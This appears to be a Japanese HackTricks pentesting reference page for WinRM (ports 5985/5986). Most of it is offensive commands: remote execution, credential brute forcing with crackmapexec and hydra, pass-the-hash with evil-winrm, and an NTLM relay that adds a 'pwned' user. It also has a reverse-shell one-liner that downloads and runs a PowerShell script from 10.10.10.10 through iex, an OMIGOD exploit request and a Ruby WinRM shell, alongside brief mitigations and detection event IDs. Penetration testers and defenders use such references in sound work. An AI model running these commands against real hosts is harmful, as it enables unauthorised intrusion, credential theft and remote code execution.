5985,5986 - Pentesting WinRM
Reading time: 16 minutes
tip
AWSハッキングを学び、実践する: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:
Azureハッキングを学び、実践する: HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
WinRM
Windows Remote Management (WinRM) は、Microsoftによって強調されたプロトコルであり、HTTP(S)を通じてWindowsシステムのリモート管理を可能にします。このプロセスではSOAPを活用しています。基本的にはWMIによって動作し、WMI操作のためのHTTPベースのインターフェースとして機能します。
マシン上にWinRMが存在することで、SSHが他のオペレーティングシステムで機能するのと同様に、PowerShellを介したリモート管理が簡単に行えます。WinRMが動作しているかどうかを確認するには、特定のポートが開いているかをチェックすることが推奨されます:
- 5985/tcp (HTTP)
- 5986/tcp (HTTPS)
上記のリストにあるポートが開いている場合、WinRMが設定されていることを示し、リモートセッションを開始する試みを許可します。
WinRMセッションの開始
WinRM用にPowerShellを構成するには、MicrosoftのEnable-PSRemoting cmdletを使用し、コンピュータがリモートPowerShellコマンドを受け入れるように設定します。昇格されたPowerShellアクセスを持っている場合、次のコマンドを実行してこの機能を有効にし、任意のホストを信頼済みとして指定できます:
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
このアプローチは、trustedhosts 設定にワイルドカードを追加することを含みます。このステップは、その影響を考慮する必要があるため、慎重な検討が求められます。また、攻撃者のマシンでネットワークタイプを「Public」から「Work」に変更する必要があることも指摘されています。
さらに、WinRMは wmic コマンドを使用してリモートで有効化できます。以下に示します:
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
この方法は、WinRMのリモートセットアップを可能にし、遠隔からWindowsマシンを管理する柔軟性を高めます。
設定されているかテストする
攻撃マシンのセットアップを確認するために、Test-WSManコマンドを使用して、ターゲットがWinRMを適切に設定しているかどうかをチェックします。このコマンドを実行することで、プロトコルバージョンやwsmidに関する詳細が返され、設定が成功したことを示します。以下は、設定されたターゲットと未設定のターゲットの期待される出力を示す例です:
- 適切に設定されたターゲットの場合、出力は次のようになります:
Test-WSMan <target-ip>
プロトコルバージョンとwsmidに関する情報が含まれており、WinRMが正しく設定されていることを示します。
.png)
- 逆に、WinRMが設定されていないターゲットの場合、詳細な情報は得られず、適切なWinRM設定がないことが強調されます。
.png)
コマンドを実行する
ターゲットマシンでipconfigをリモートで実行し、その出力を表示するには、次のようにします:
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
.png)
現在のPSコンソールのコマンドを**_Invoke-Commandを介して実行することもできます。ローカルにenumeration_という関数があり、リモートコンピュータでそれを実行したい場合、次のようにします:
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
スクリプトを実行する
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
リバースシェルを取得する
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
PSセッションを取得する
インタラクティブなPowerShellシェルを取得するには、Enter-PSSessionを使用します:
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
.png)
セッションは「被害者」の中の新しいプロセス(wsmprovhost)で実行されます
WinRMを強制的に開く
PSリモーティングとWinRMを使用するために、コンピュータが構成されていない場合は、次のコマンドで有効にできます:
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
セッションの保存と復元
この方法は機能しません、もしリモートコンピュータで言語が制約されている場合。
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1
このセッション内では、Invoke-Command を使用して PS スクリプトをロードできます。
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
エラー
次のエラーが表示された場合:
enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.
クライアントで試してみてください(情報は here から):
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
WinRM接続のLinuxでの実行
ブルートフォース
注意してください。winrmのブルートフォースはユーザーをブロックする可能性があります。
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
evil-winrmの使用
gem install evil-winrm
ドキュメントをGitHubで読む: https://github.com/Hackplayers/evil-winrm
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>
evil-winrmを使用してIPv6アドレスに接続するには、_/etc/hosts_内にエントリを作成し、ドメイン名をIPv6アドレスに設定して、そのドメインに接続します。
evil-winrmでハッシュを渡す
evil-winrm -u <username> -H <Hash> -i <IP>
.png)
PS-docker マシンの使用
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
Rubyスクリプトの使用
ここから抽出したコード: https://alamot.github.io/winrm_shell/
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/
conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)
class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end
command=""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end
Shodan
- port:5985 Microsoft-HTTPAPI
最近の脆弱性と攻撃技術 (2021-2025)
NTLMリレーをWinRM (WS-MAN)に直接
Impacket 0.11(2023年5月)以降、ntlmrelayx.pyはキャプチャしたNTLM認証情報をWS-MAN/WinRMリスナーに直接リレーできます。ホストが**暗号化されていないHTTP (5985)**でリスニングしている場合、攻撃者はmitm6(またはResponder)を組み合わせて認証を強制し、SYSTEMレベルのコード実行を取得できます。
sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \
--command "net user pwned P@ssw0rd! /add"
緩和策
- HTTPリスナーを無効にする – Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false
- HTTPSを強制し、最近のWindowsバージョンで認証のための拡張保護(EPA)を有効にする。
OMIGOD – CVE-2021-38647 (Azure OMI)
Azure Linuxエージェントは、ポート 5985/5986 でWinRM/WS-MAN APIを公開する**Open Management Infrastructure (OMI)**サービスを使用しています。論理エラーにより、認証されていないRCEがrootとして可能になりました:
curl http://victim:5985/wsman -H 'Content-Type:text/xml' -d '<xml …/>'
OMI(バージョン ≥ 1.6.8-1)をパッチまたは削除し、これらのポートをインターネットからブロックします。
WSMan.Automation COMの悪用による横移動
WinRMは、WSMan.Automation COMオブジェクトを介してPowerShellなしで操作できます - 制約付き言語モードのシステムで便利です。SharpWSManWinRMのようなツールは、この技術をラップします:
$ws = New-Object -ComObject 'WSMan.Automation'
$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null)
$cmdId   = $session.Command('cmd.exe',@('/c','whoami'))
$session.Signal($cmdId,0)
実行チェーン(svchost → wmiprvse → cmd.exe)は、従来のPS-リモーティングと同じです。
ツールの更新
- Evil-WinRM v3.x (2024) – 現在、Kerberos(-k/--spn)および証明書ベースの認証(--cert-pem/--key-pem)、セッションログ(-L)、リモートパス補完を無効にする機能(-N)をサポートしています。
RHOST=10.0.0.25 evil-winrm -i $RHOST -u j.doe -k --spn HTTP/$RHOST
- Python – pypsrp0.9 (2024) は、CredSSPおよびKerberosを含むLinuxからのWinRMおよびPS-リモーティングを提供します:
from psrp.client import Client
c = Client('srv01', username='ACME\\j.doe', ssl=True)
print(c.execute_cmd('ipconfig /all').std_out.decode())
- 検出 – Microsoft-Windows-WinRM/Operational ログを監視します:
- イベント 91 / 163 – シェルが作成されました
- イベント 182 – 認証失敗
- セキュリティログのイベント 4262 は、ソースIPを記録します(2022年7月のCUで追加)。 これらを中央で収集し、匿名または外部IPにアラートを出します。
Shodan
- port:5985 Microsoft-HTTPAPI
参考文献
- 
https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ 
- 
https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/ 
- 
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure 
- 
https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ 
HackTricks 自動コマンド
Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
Port_Number:  5985     #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment        #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory        or -s to upload scripts (sherlock)
menu
invoke-binary `tab`
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
https://book.hacktricks.wiki/en/network-services-pentesting/5985-5986-pentesting-winrm.html
Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
tip
AWSハッキングを学び、実践する: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:
Azureハッキングを学び、実践する: HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
 HackTricks
HackTricks